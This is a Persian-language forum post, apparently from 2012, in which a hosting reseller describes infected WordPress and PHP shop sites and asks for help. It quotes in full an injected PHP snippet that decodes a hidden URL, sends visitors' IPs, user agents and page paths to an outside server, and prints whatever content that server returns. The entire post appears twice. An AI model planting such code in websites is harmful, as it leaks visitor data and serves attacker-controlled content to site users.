msitman
February 12th, 2012, 20:07
سلام
من از ****** ریسلری دارم حدودا 10 تا اکانت روش تعریف شده. حدود یک هفته هست نمیدونم از کجا بلایی افتاده به جون سایتهام که کلافم کرده.:62:
روزانه تقریبا 60 تا ایمیل از سرور میاد !! که میگه آنتی ویرس فلان فایل مشکوک رو حذف کرد. بیشتر سایتهام وردپرس هستن اما دوتاشون از اسکریپت سیکما و فروشگاه ساز آبتین استفاده میکنند که فایل ایندکس اونها هم ادیت شده.
نمیدونم چیه. گشتن تو اینترنت و گوگل کردن هم اطلاعات زیادی نمیده.
این ویروس یا هر چی که هست به ابتدای ایندکس این رو اضافه میکنه:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBoc A==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
اون خطی که کد شده رو وقتی دیکد میکنم اینه: http://hotlogupdate.com/stat/stat.php
تا دو سه روز پیس خودم ایندکسها رو دستی درست میکردم و این کد ها رو ورد مداشتم و همه چی ظاهرا درست میشد اما الان نمیدونم چی شده که ایندکسها توسط آنتی ویرس پاک میشن.
قبلا آنتی ویرس فایلی رو به نام counter.php رو حذف میکرد اما الان فایلهایی به اسامی مختلف ساخته میشه که عدد هستن مثلا 354656.php و از این دست. و البته همونطور که گفتم هر فایل ایندکسی که وجود داشته باشه هر جایی که باشه دستکاری میشه و آنتی ویرس هم فوری ترتیبش رو میده !
بهمین خاطر عملا همه سایتهام از بین رفتن چون فایل index.php وجود نداره.
هاستینگ گفت پسوردهات رو تغییر بده و فایلهات رو اسکن کن (نمیدونم روی سرور اسکن کنم - که آنتی ویرس هست- یا دانلود کنم و اسکن کنم؟). پسوردها رو عوض کردم اما فایده نداره انگار روی ریسلری افتاده و کاری به تعویض پسورد نداره. برگردوندن بکاپ رو هنوز انجام ندادم چون مسلما این مشکل بر میگرده.
اکانتهایی که لازم نبود رو ساسپند کردم اما الان رفته سراغ 2 تا دیگه که یکیشون همون اسکریپت سیکما هست.
سیستم خودم رو کامل اسکن کردم و کوکی و فایلهای موقتی و هر چیزی که مشکوک بود رو حذف کردم.
توی stackoverflow.com سئوال کردم یه نفر اینطور توضیح داده که:
اگر کاربری بیاد نوی سایتت و user-agentش معلوم نباشه این کد اون رو bot تشخیص میده و این آدرس رو صدا میزنه:
http://hotlogupdate.com/stat/stat.php?ip={ip}&useragent={useragent}&...
از دوستان اگر کسی به این مشکل برخورده یا میتونه کمک کنه پیشاپیش ممنون میشم
(همین الان که این مطلب رو نوشتم 22 تا ایمیل دیگه اومد! به ایندکس اضافه کنید footer.php رو. اون هم حذف شده. نمونه ریپورت آنتی ویروس:
/home/site/public_html/wp-includes/theme-compat/footer.php: {HEX}php.nested.base64.510.UNOFFICIAL FOUND)
من از ****** ریسلری دارم حدودا 10 تا اکانت روش تعریف شده. حدود یک هفته هست نمیدونم از کجا بلایی افتاده به جون سایتهام که کلافم کرده.:62:
روزانه تقریبا 60 تا ایمیل از سرور میاد !! که میگه آنتی ویرس فلان فایل مشکوک رو حذف کرد. بیشتر سایتهام وردپرس هستن اما دوتاشون از اسکریپت سیکما و فروشگاه ساز آبتین استفاده میکنند که فایل ایندکس اونها هم ادیت شده.
نمیدونم چیه. گشتن تو اینترنت و گوگل کردن هم اطلاعات زیادی نمیده.
این ویروس یا هر چی که هست به ابتدای ایندکس این رو اضافه میکنه:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBoc A==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
اون خطی که کد شده رو وقتی دیکد میکنم اینه: http://hotlogupdate.com/stat/stat.php
تا دو سه روز پیس خودم ایندکسها رو دستی درست میکردم و این کد ها رو ورد مداشتم و همه چی ظاهرا درست میشد اما الان نمیدونم چی شده که ایندکسها توسط آنتی ویرس پاک میشن.
قبلا آنتی ویرس فایلی رو به نام counter.php رو حذف میکرد اما الان فایلهایی به اسامی مختلف ساخته میشه که عدد هستن مثلا 354656.php و از این دست. و البته همونطور که گفتم هر فایل ایندکسی که وجود داشته باشه هر جایی که باشه دستکاری میشه و آنتی ویرس هم فوری ترتیبش رو میده !
بهمین خاطر عملا همه سایتهام از بین رفتن چون فایل index.php وجود نداره.
هاستینگ گفت پسوردهات رو تغییر بده و فایلهات رو اسکن کن (نمیدونم روی سرور اسکن کنم - که آنتی ویرس هست- یا دانلود کنم و اسکن کنم؟). پسوردها رو عوض کردم اما فایده نداره انگار روی ریسلری افتاده و کاری به تعویض پسورد نداره. برگردوندن بکاپ رو هنوز انجام ندادم چون مسلما این مشکل بر میگرده.
اکانتهایی که لازم نبود رو ساسپند کردم اما الان رفته سراغ 2 تا دیگه که یکیشون همون اسکریپت سیکما هست.
سیستم خودم رو کامل اسکن کردم و کوکی و فایلهای موقتی و هر چیزی که مشکوک بود رو حذف کردم.
توی stackoverflow.com سئوال کردم یه نفر اینطور توضیح داده که:
اگر کاربری بیاد نوی سایتت و user-agentش معلوم نباشه این کد اون رو bot تشخیص میده و این آدرس رو صدا میزنه:
http://hotlogupdate.com/stat/stat.php?ip={ip}&useragent={useragent}&...
از دوستان اگر کسی به این مشکل برخورده یا میتونه کمک کنه پیشاپیش ممنون میشم
(همین الان که این مطلب رو نوشتم 22 تا ایمیل دیگه اومد! به ایندکس اضافه کنید footer.php رو. اون هم حذف شده. نمونه ریپورت آنتی ویروس:
/home/site/public_html/wp-includes/theme-compat/footer.php: {HEX}php.nested.base64.510.UNOFFICIAL FOUND)